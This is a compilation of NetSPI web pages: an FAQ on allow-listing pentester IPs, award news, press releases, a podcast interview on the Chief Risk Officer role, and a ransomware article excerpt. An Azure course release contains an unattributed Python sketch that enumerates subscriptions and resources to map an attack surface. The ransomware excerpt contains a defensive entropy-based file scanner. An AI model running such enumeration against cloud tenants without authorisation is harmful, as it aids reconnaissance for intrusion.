Ultimately, it’s up to security leaders to decide what they want from their penetration test. If it’s breadth and depth, start making moves to allow list IPs. The bottom line is that you’ll get a better return on your penetration testing budget if you enable your pentesters in this way. For answers to some of the most frequently asked questions about allow listing IPs during web app pentesting or external network pentesting, continue reading.

Frequently asked questions about allow listing IP addresses during penetration testing:

I get signature updates every day, shouldn’t I be protected?

While this is a best practice, signatures are only as good as the logic that lies within them. Just because a signature is intended to detect a new technique does not mean detection is guaranteed. There can be different variations of the technique, the signature may not be comprehensive or work properly, or the signature may generate too many false positives and get turned off by the IPS/WAF administrator, among other reasons.

Will allow listing the tester make us vulnerable?

When done correctly, only traffic coming from the tester's supplied IP addresses will be exempt from blocking by the IPS/WAF. The pentester's traffic should still generate alerts if it is found to be suspicious, and the IPS/WAF will still act as it normally would on all other traffic.

Which activities are affected if a tester is not allow listed?

Any active information gathering techniques, as well as brute forcing, directory enumeration, unencrypted exploits, and similar activities.

What is the difference between a pentest versus a red team engagement?

A pentest prioritizes issue discovery, while a red team engagement is meant to more closely simulate a real threat actor. A red team engagement typically takes longer and does not require allow listing. The red team will take the path of least resistance and report on high-severity issues that allow compromise, but there will not be the mass scanning and issue discovery found in a pentest. Often, red team engagements are leveraged by organizations with a more mature security posture.

Can we test the current configuration of our IPS/WAF too?

Yes, any reputable pentest provider should allow for this. Though, it is important to first understand the third-party testing that IPS/WAF vendors undergo. Variations in implementations of IPS/WAF products do exist across different environments, and it can still be valuable to test against the current configuration or implementation. Solutions include: starting with allow listing on and turning it off near the end to see if findings can still be replicated; turning allow listing off at the beginning and only turning it on if the testers are not making significant or valuable progress; or contracting an additional engagement with the testing provider to specifically test the IPS/WAF configuration. Conducting a red team engagement can also be valuable for those with a more mature security posture.

Our MSSP is telling us that allow listing pentester IPs is not possible, what can we do?

This is unlikely to be true. If they cannot accommodate allow listing, you may want to extend the time scope of the engagement to ensure you are getting quality results.

Concerned about your organization's cybersecurity? Work with NetSPI's expert pentesters!

Minne Inno announces the 2021 Fire Awards

On June 18, 2021, NetSPI was recognized as a 2021 Fire Award winner.

The Fire Awards are always meant to be a celebration of the companies and people that keep Minnesota’s tech and startup scene alive.

With this year’s fourth annual Fire Awards, we want to celebrate even harder than ever before after one of the most trying years in memory. That’s why we have the biggest Fire Awards ever, honoring 50 companies from across the state.

We sourced these Fire winners from our readers and added some companies that have made waves in the past year or are on the precipice of big things. Many companies were honored because of the steps they took to help tackle the Covid-19 pandemic.

In July, a Blazer winner will be selected from each category by a panel of judges. Blazer winners are the hottest companies in each category, deserving some extra recognition. More details about that event will come out later this month.

We’ve honored companies in a variety of categories. Startup of the Year is the startup that has risen above the rest in the past year, while the Growing Companies category is for those companies that are a bit smaller but show the potential to be a Startup of the Year down the road. We’re also honoring the organizations that support our ecosystem with the community builder category, as well as a few specific industries like medical devices and health and wellness.

Let’s meet our Fire winners!

High Tech Company:

NetSPI is a Minneapolis-based cybersecurity company that specializes in penetration testing, which is sometimes called ethical hacking. In May, it raised $90 million in venture capital. Its clients include Fortune 500 companies like Medtronic and Microsoft.

Digi Key is an electronics distributor and one of Minnesota’s largest private companies. The Thief River Falls-based company helped the University of Minnesota produce the Coventor, a jerry-rigged ventilator that helped address ventilator shortages during the Covid-19 pandemic.

Arctic Wolf is a transplanted unicorn cybersecurity company. Founded in Silicon Valley, it moved to Eden Prairie in 2020 at the same time it announced a $200 million round of venture capital funding at a valuation of over $1 billion.

Lucy, also known as Equals3, is a Minneapolis-based AI firm that helps Fortune 500 clients manage their data. It raised $3 million in June and plans to double its employee base to over 50 by the end of the year.

Carrot Health is a Minneapolis-based firm that collects consumer data for health plans to help them address what are known as the social determinants of health, or environmental factors that affect people’s health. It has been experiencing 100% growth since it was founded.

Read the full article here: https://www.bizjournals.com/twincities/inno/stories/inno-on-fire/2021/06/18/meet-minne-innos-2021.html

Back

Improve Ransomware Attack Resiliency with NetSPI’s New Ransomware Attack Simulation

Through the tech-enabled service, organizations can put their ransomware prevention and detection capabilities to the test.

Minneapolis, Minnesota  –  NetSPI, the leader in enterprise penetration testing and attack surface management, today announced its new ransomware attack simulation service. In collaboration with its ransomware security experts, the new service enables organizations to emulate real-world ransomware families to find and fix critical vulnerabilities in their cybersecurity defenses.

Recent ransomware attacks have exposed major cybersecurity gaps globally. In the U.S., the Biden administration is urging business leaders to take immediate steps to prepare for ransomware attacks. In a recent memo, deputy national security advisor for cyber and emerging technology Anne Neuberger recommends organizations, “use a third-party pentester to test the security of your systems and your ability to defend against a sophisticated [ransomware] attack.”

“Paying a ransom doesn’t guarantee your data is returned safely, yet one in four companies worldwide pay the adversaries¹,” said Scott Sutherland, Practice Director at NetSPI. “Organizations must get more proactive with their security efforts to avoid paying the ransom and funding the cybercriminals. Ransomware families are both opportunistic and targeted – and no industry is exempt from falling victim to an attack.”

“NetSPI is eager to help organizations achieve a more scalable and continuous assessment of their environment from the perspective of an adversary,” said Charles Horton, COO at NetSPI. “The addition of the ransomware attack simulation service to our adversary simulation solutions will further help organizations strengthen their defenses and become more resilient against ransomware attacks.”

During a ransomware attack simulation engagement, NetSPI closely collaborates with organizations to simulate sophisticated ransomware tactics, techniques, and procedures (TTPs) using its custom-built breach and attack simulation technology. Following each engagement, organizations gain access to NetSPI’s technology to run custom plays on their own and continuously evaluate how well their cybersecurity program will hold up to a ransomware attack.

Learn more about NetSPI’s ransomware attack simulation online here and download The Ultimate Guide to Ransomware Attacks for insights on how to prevent and respond to a ransomware attack.

The Ultimate Guide to Ransomware Attacks – Download Now

¹ SonicWall 2021 Cyber Threat Report; https://www.sonicwall.com/2021-cyber-threat-report/

About NetSPI

NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ platform and adversary simulation through its Red Team Toolkit. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.

Contact:
Tori Norris
Marketing Manager, NetSPI
victoria.norris@netspi.com
(630) 258-0277


NetSPI Named a 2021 Top Workplace in Minnesota

Minneapolis, Minnesota  –  NetSPI, the leader in enterprise penetration testing and attack surface management, has been named one of the Top Workplaces in Minnesota by the Star Tribune. Top Workplaces recognizes the most progressive companies in Minnesota based on employee opinions measuring engagement, organizational health, and satisfaction. 

“NetSPI wouldn’t be what it is today without its employees and the culture of innovation that we’ve built,” said NetSPI President and CEO Aaron Shilts. “Even during a turbulent 2020, we had an employee retention rate of 92% which alone speaks volumes in an industry that has zero percent unemployment. I thank each and every member of our team for helping to make NetSPI a Top Workplace.”

The results of the Star Tribune Top Workplaces are based on survey information collected by Energage, an independent company specializing in employee engagement and retention. The analysis includes responses from over 76,000 employees at Minnesota public, private and nonprofit organizations. 

NetSPI is hiring—apply today!

“We are especially proud of the fact that our employees called out NetSPI’s top strengths as interdepartmental cooperation, execution, and innovation. This award shows how well our teams work together, which is a key to our success,” said NetSPI Director of People Operations Heather Neumeister. “Seeing the variety of responses throughout the survey really validates the culture we have at NetSPI. Working with great people, doing important work, and having fun came through in many of the comments provided.”

This Top Workplace recognition follows an especially successful 12 months for NetSPI. Recently, NetSPI announced it raised $90 million in growth funding led by KKR, with participation from Ten Eleven Ventures. In 2020, NetSPI acquired Silent Break Security and incorporated its proprietary Adversary Simulation and Red Team Toolkit software into the company’s offensive cyber security and attack surface management offerings. NetSPI also launched Penetration Testing as a Service (PTaaS) in 2020, powered by its Resolve™ platform. 2021 also promises more business opportunities for NetSPI with upcoming additions of risk scoring, vulnerability intelligence, ransomware attack simulation, and more.

To qualify for the Star Tribune Top Workplaces, a company must have more than 50 employees in Minnesota. Nearly 3,000 companies were invited to participate. Rankings were composite scores calculated purely on the basis of employee responses.

About NetSPI

NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest health care companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ platform and adversary simulation through its Red Team Toolkit. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.

Media Contacts:
Elyse Bauchle, Maccabee PR for NetSPI
elyse@maccabee.com
(612) 294-3125

Tori Norris
Marketing Manager, NetSPI
victoria.norris@netspi.com
(630) 258-0277


The Evolution of the Chief Risk Officer

It is amazing how much the cybersecurity industry has grown and evolved over the years. If you look back even a couple of years, the strategic conversations we were having have certainly changed. The space is evolving, and each of us in the industry is having to evolve with it to stay current. One area that has evolved greatly over time is risk management, specifically the role of the Chief Risk Officer.

To dig deeper on its evolution, I sat down with CEO and founder of Risk Neutral Jeff Sauntry on the Agent of Influence podcast, a series of interviews with industry leaders and security gurus where we share best practices and trends in the world of cybersecurity and vulnerability management. Read on for highlights from our conversation around risk management, the role of the Chief Risk Officer, and more.

Nabil: Let’s start by talking about risk management. How did you make that transition from cybersecurity to risk management?

Jeff: For me, it was a natural evolution to upskill my vocabulary as I started interacting with more senior business leaders and board members. When the board members and the C-suite have normal discussions, they’re still discussing challenges and opportunities, but they’re speaking in terms of risk, cost, and outcomes. In cybersecurity, we’re often discussing threats and consequences. Something was getting lost in translation, so I decided to build on my strong technical and cybersecurity background, dig into risk management, and become a more effective communicator.

Nabil: What would you say are some of the key characteristics that make someone great at risk management?

Jeff: My whole career had risk management components to it, but I did not yet understand risk as an empirical domain. That’s one of the reasons I chose to make this pivot. I also made the investment of time and resources to go to Carnegie Mellon and get my Chief Risk Officer certification. What was great about that is I went from being very myopic – maybe talking about technology, operational, or compliance risk – to opening my eyes to the fact that there are five major risk categories that every business has to worry about: strategic risk, which is by far the most important (if you don’t get that one right, nothing else matters), then operational, financial, and compliance risk, with reputational risk coming into play if any of the first four fail.

Nabil: Tell me more about your experience at Carnegie Mellon.

Jeff: Most of us in cybersecurity are very familiar with some of the great work Carnegie Mellon has done with the Capability Maturity Model Integration (CMMI) maturity model and the insider threat program, and they have been a great partner with the government in terms of coming up with funded cybersecurity programs. I was familiar with the quality of the Carnegie Mellon products and insights, and when I read the curriculum, I thought to myself, “this is going to be really awesome.” One thing I wanted to avoid was a course composed entirely of fintech leaders. For a lot of people, fintech and financial services firms lead the way in terms of Chief Risk Officers and managing risk from a quantifiable perspective. But I knew the risk domain was much bigger, and I wanted to be a well-rounded risk professional. Having a very broad group of peers in my cohort really helped me, as did the caliber of instructors they brought in who could talk about the different ways to look at risk. I feel that I can now talk about enterprise risk management programs and not have such a myopic view around cybersecurity-, technology-, or compliance-related risk.

Nabil: Do you think the way organizations approach cybersecurity risk today needs to evolve?

Jeff: One hundred percent! It’s one of those things that you’re embarrassed about because you’ve been part of the problem for so long. We have to take a hard look in the mirror. I’ve looked back at some of the conversations I’ve had and they’re almost cringeworthy. Given the knowledge I have gained in the last two years about risk management, I wish I could go back and redo conversations with certain clients. 

Nabil: From your experience, how has the role of the Chief Risk Officer evolved?

Jeff: A big part of this evolution is the cybersecurity profession. In general, cybersecurity is very focused on technical skills. That’s naturally how a lot of us come up through our profession and education. But it’s even more important to understand that if you can’t explain the outcome of your results or your findings, it’s not going to resonate with clients. It’s as if you never did a security engagement if you can’t get the message or the impact across. That’s where I think the risk management professional is evolving: improving soft skills so that cybersecurity risk can have a seat at the table rather than someone coming in to tell them that the sky is falling. The Chief Risk Officer has to be a true peer to the rest of the C-suite, and they should even have a solid line into the board of directors. Most companies should think about having a dedicated Risk Management Committee at the management level that’s complemented by one at the board level so that risk gets the right amount of time and attention. Then, you’ll have people with the right skill set in the room having the right discussions.

One of the important things that came out of the financial services industry is the finding that if the risk managers embedded within each business unit are there to please their boss and rubber-stamp high-risk decisions, it can end badly. This is part of what got us into the big financial meltdown of 2008/2009. It should have been a canary-in-the-coal-mine moment for risk management as a profession: you have to be very careful to ensure the Chief Risk Officer can operate independently. They need the right reporting structures and shouldn’t be allowed to be fired on a whim because they raised their hand and said, “I think this is a little too risky for us.” So, I think the evolution of the Chief Risk Officer is at a very exciting point in time right now.

Nabil: Let’s talk a little bit about your advisory board work. Do you have any advice for others who are looking to work in that capacity?

Jeff: You need to be very pragmatic, just as you would be in planning your education, your master’s degree, and your career. The board journey is very much the same. You should start with an organization that you’re passionate about in order to understand: What are the procedures? What roles are played? What are the different committees? Then, as you decide whether you want to pursue service on a private board or a public board, think about the additional skill sets you may need around fiduciary responsibilities, insurance, and the personal and professional liabilities involved. Set a game plan for yourself, make some investments of time and money, and really figure out what it takes to be a board professional. I think it’s very worthwhile. People with a strong technical and cybersecurity background definitely have something to contribute to advisory boards from a cognitive diversity perspective, as organizations face digital transformations and threats from a wider range of actors each year.

Nabil: You are a scuba instructor and a captain in the US Merchant Marine. What parallels do you draw between being a scuba instructor or captain and risk management?

Jeff: All of us have something to learn from an environmental, social, and governance perspective. One of the reasons I’m a merchant marine captain is that people protect what they know. I thought it was extremely important to get people under the water to really understand things like what plastics are doing to our oceans, and to see that, yes, the stuff you throw out of your car actually does make it into environments that we care about.

Everything related to instructing scuba is about risk management. The standards they have for teaching, how many students you can have per instructor, the burden being on the instructor to determine whether it’s safe to do certain things, the insurance I have to carry – all that stuff is designed to minimize risk to the students and staff. It’s incredible how they handle violations of policy. There’s a professional journal and if somebody does something wrong, they put it out there for everyone to learn from. 

The reality is that when you take people out onto the ocean and you’re responsible for them, you need to bring them back healthy and safe. This comes down to three things: What experience do I bring to those situations based on the training I’ve had on the water? What is the quality of the vessel and the equipment that I’m relying on to help me deal with those situations? And how prepared am I for this situation? Those are the three things as a captain that you can control.

Those core concepts translate well to cybersecurity. How prepared are you to do the job you’ve been asked to do as part of a team? How well have you prepared your organization to deal with a specific threat? That prudent mindset of being a good steward for the people you’re responsible for resonates with cybersecurity professionals as well.

Agent of Influence - Episode 026 - The Evolution of Risk Management and the Chief Risk Officer - Jeff Sauntry
Back

Azure Cloud Pentesting Added to NetSPI’s Roster of Cybersecurity Training Courses

The new training course provides a deep dive into the attack surface introduced by Azure and how to exploit its vulnerabilities.

Minneapolis, Minnesota  –  NetSPI, the leader in enterprise penetration testing and attack surface management, today announced Dark Side Ops (DSO) 3: Azure Cloud Pentesting, a new cybersecurity training course focused on Azure cloud penetration testing. Participants will gain a better understanding of potential risks associated with Azure cloud deployments, how to exploit them, and how to prevent and remediate critical cloud vulnerabilities.

As experts anticipate that cloud adoption will soar in the aftermath of the COVID-19 pandemic [I], this course helps cybersecurity, DevOps, and IT professionals better grasp the complexities that accompany Microsoft’s Azure cloud platform. The first public DSO 3: Azure Cloud Pentesting training is scheduled for August 23–24, 2021, and will be conducted virtually. The two-day training session costs $2,000 per person.

“It’s no surprise that cloud security was listed as the most important skill needed to pursue a cybersecurity career in the latest (ISC)² Cybersecurity Workforce Study [II],” said Aaron Shilts, President and CEO at NetSPI. “An emphasis on cloud security education and training is critical as the attack surface grows.”

“Not only does DSO 3: Azure Cloud Pentesting feature a live cloud environment and real-world examples from our extensive cloud penetration testing work, it is also designed and instructed by NetSPI practice director Karl Fosaaen, one of the foremost experts on Azure penetration testing,” Shilts added.

“Traditional network penetration testing processes need to be updated to account for the intricacies introduced by cloud infrastructure,” said Karl Fosaaen, Cloud Practice Director at NetSPI. “Through the training, I’m eager to teach others how to level up their on-premises penetration testing skills and apply them to the Azure cloud.”
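To give a sense of what this looks like in practice, below is a minimal, purely illustrative sketch of the kind of subscription and resource enumeration that often serves as a first step in an Azure penetration test. It is not taken from the course material; the use of the azure-identity and azure-mgmt-resource Python packages, DefaultAzureCredential, and a credential with Reader access are all assumptions made for this example.

```python
# Illustrative only -- not course material. Assumes the azure-identity and
# azure-mgmt-resource packages and a credential with Reader access.
from azure.identity import DefaultAzureCredential
from azure.mgmt.resource import SubscriptionClient, ResourceManagementClient

# DefaultAzureCredential tries environment variables, managed identity,
# Azure CLI login, and other sources in order.
credential = DefaultAzureCredential()

# Enumerate every subscription the credential can see, then list the
# resources in each one -- a common first step when mapping an Azure
# attack surface.
subscription_client = SubscriptionClient(credential)
for sub in subscription_client.subscriptions.list():
    print(f"Subscription: {sub.display_name} ({sub.subscription_id})")
    resource_client = ResourceManagementClient(credential, sub.subscription_id)
    for resource in resource_client.resources.list():
        print(f"  {resource.type}: {resource.name}")
```

In an assessment, an inventory like this simply scopes what the tested credential can see; the work of spotting misconfigurations in the enumerated resources comes after.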

NetSPI’s Dark Side Ops trainings, DSO 1: Malware Dev, DSO 2: Adversary Simulation, and DSO 3: Azure Cloud Pentesting, are available as private trainings upon request. Contact NetSPI for more information regarding private group training sessions.

For additional training details and course requirements, visit the NetSPI website. Registration is now open for all August 2021 DSO cybersecurity training courses.

Dark Side Ops 3: Azure Cloud Pentesting virtual course on August 23–24, 2021 (9AM to 5PM CT)

[I] Gartner Newsroom; November 17, 2020; https://www.gartner.com/en/newsroom/press-releases/2020-11-17-gartner-forecasts-worldwide-public-cloud-end-user-spending-to-grow-18-percent-in-2021
[II] (ISC)² Cybersecurity Workforce Study 2020; https://www.isc2.org/Research/Workforce-Study

About NetSPI

NetSPI is the leader in enterprise security testing and attack surface management, partnering with nine of the top 10 U.S. banks, three of the world’s five largest healthcare companies, the largest global cloud providers, and many of the Fortune® 500. NetSPI experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces, historically testing over 1 million assets to find 4 million unique vulnerabilities. NetSPI offers Penetration Testing as a Service (PTaaS) through its Resolve™ platform and adversary simulation through its Red Team Toolkit. NetSPI is headquartered in Minneapolis, MN and is a portfolio company of private equity firms Sunstone Partners, KKR, and Ten Eleven Ventures. Follow us on Facebook, Twitter, and LinkedIn.

Contact:
Tori Norris
Marketing Manager, NetSPI
victoria.norris@netspi.com
(630) 258-0277

Back

Inc: 6 Things Every Small Business Needs to Know About Ransomware Attacks

On June 25, 2021, NetSPI Chief Operating Officer Charles Horton was featured in an Inc article:

 

It’s tempting to think the average cyber extortionist has bigger fish to fry than your small business. Last month alone, hackers targeted the largest petroleum pipeline in the United States, Ireland’s national health service, the city of Gary, Indiana, and numerous other big targets.

But while they may receive less attention, 50 to 70 percent of ransomware attacks are aimed at small and medium-sized companies, Secretary of Homeland Security Alejandro Mayorkas said during a U.S. Chamber of Commerce event in May. And changes in business practices, accelerated by the pandemic, have left small businesses even more vulnerable.

In ransomware attacks, cyber criminals use malware to take over and encrypt a victim’s files and data, effectively holding the data hostage until they’re paid to release it. The recent surge in remote work was a golden opportunity for hackers, who took advantage of out-of-date VPNs and unsecured home networks.
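Because encrypted data is statistically close to random noise, one crude way defenders can spot the aftermath of such an attack is to look for files whose contents show abnormally high entropy. The sketch below is a hypothetical illustration of that idea, not a tool from the article; the scanned directory and the 7.5-bits-per-byte threshold are assumptions chosen for the example.

```python
# Hypothetical illustration: flag files whose byte entropy suggests they
# may have been encrypted. Not a substitute for real ransomware defenses.
import math
from pathlib import Path

def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte; encrypted data approaches the maximum of 8."""
    if not data:
        return 0.0
    counts = [0] * 256
    for byte in data:
        counts[byte] += 1
    total = len(data)
    return -sum((c / total) * math.log2(c / total) for c in counts if c)

# Scan a directory tree (the path is an assumption for the example) and
# report files that look uniformly random -- a rough signal of encryption.
for path in Path("./shared_drive").rglob("*"):
    if path.is_file():
        sample = path.read_bytes()[:65536]  # a 64 KiB sample is enough
        if shannon_entropy(sample) > 7.5:   # threshold chosen for illustration
            print(f"High-entropy file (possibly encrypted): {path}")
```

Note that legitimately compressed formats such as ZIP or JPEG also score high, so in practice a heuristic like this would be combined with rate-of-change monitoring, reliable backups, and proper endpoint detection.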

The consequences of a ransomware attack on a small company aren’t as wide-ranging as those on a hospital or a public utility, but the result for the victim can be more crippling. An estimated 60 percent of small businesses fail within six months of an attack, according to the National Cyber Security Alliance. For the companies that do recover, repeat ransomware attacks are increasingly common: Roughly 80 percent of victims are hit a second time, according to a report from Boston-based cybersecurity firm Cybereason.

Small businesses are attractive targets because they typically lack the budget and resources to prevent, identify, respond to, and recover from threats. There are, however, some simple methods that can help, says Charles Horton, chief operating officer of cybersecurity firm NetSPI. Here are a few things he and other experts say you should know about ransomware.

 

To learn more, read the full article here: https://www.inc.com/amrita-khalid/ransomware-hackers-crime-cybersecurity-tips.html

 
